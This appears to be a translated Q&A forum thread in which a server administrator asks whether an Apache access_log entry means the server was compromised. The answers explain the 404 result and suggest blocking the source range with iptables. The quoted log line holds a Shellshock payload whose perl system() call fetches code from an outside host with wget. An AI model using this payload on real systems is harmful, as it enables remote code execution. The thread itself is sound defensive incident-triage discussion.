我在access_log文件中发现了以下错误。我的服务器是否被黑客入侵,因为我不知道为什么我的服务器上会出现IP地址和日志:
GET /cgi-bin/test.sh HTTP/1.1" 404 292 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate
GET /w00tw00t.at.ISC.SANS.DFind:)
答案 0 :(得分:0)
可能你没被黑了。但是,检查服务器是否有任何黑客攻击迹象(根和非根类似于webroot中的已修改文件)是个好主意。
在第一行中,他们尝试访问您的服务器上可能不存在的文件/cgi-bin/test.sh(http错误代码404,当找不到文件时,可能由apache本身返回;或者它本可以通过cgi脚本返回,但我怀疑)。
该行的其余部分(包括wget)是Referer http标头。我不知道将漏洞代码放在那里的确切原因,但它可以通过编写错误的日志文件分析器来执行。这也是垃圾邮件发送者将链接指向其网站的原因。这里似乎Referer标题的内容应该是脚本本身的输入,但由于某种原因不是。
答案 1 :(得分:0)
我会说这是互联网静电噪音的一部分。 WGET和类似的请求是让你的机器取一些东西 - 也许有人试图用你作为代理?
你不能做太多,你可以在iptables上阻止这个ip提供者,但它不会阻止另一个使用不同IP的尝试。
获取违规提供商的IP范围:
whois 88.198.96.10
您将获得包括88.198.96.0 - 88.198.96.31在内的内容 - 这是您不想访问的IP范围。
更新IPtables:
iptables -A INPUT -m iprange --src-range 88.198.96.0-88.198.96.31 -j DROP iptables -A OUTPUT -m iprange --dst-range 88.198.96.0-88.198.96.31 -j DROP
这样您就可以阻止88.198.xxxxx的整个ISP范围进出。
请记住仅阻止您未提供任何服务的范围!这两行将无意中阻止与此ISP的所有通信。此外,请记住-A参数附加到规则链的末尾,因此如果您有一个允许显式显示此IP范围或其中一部分的规则,请相应地进行调整。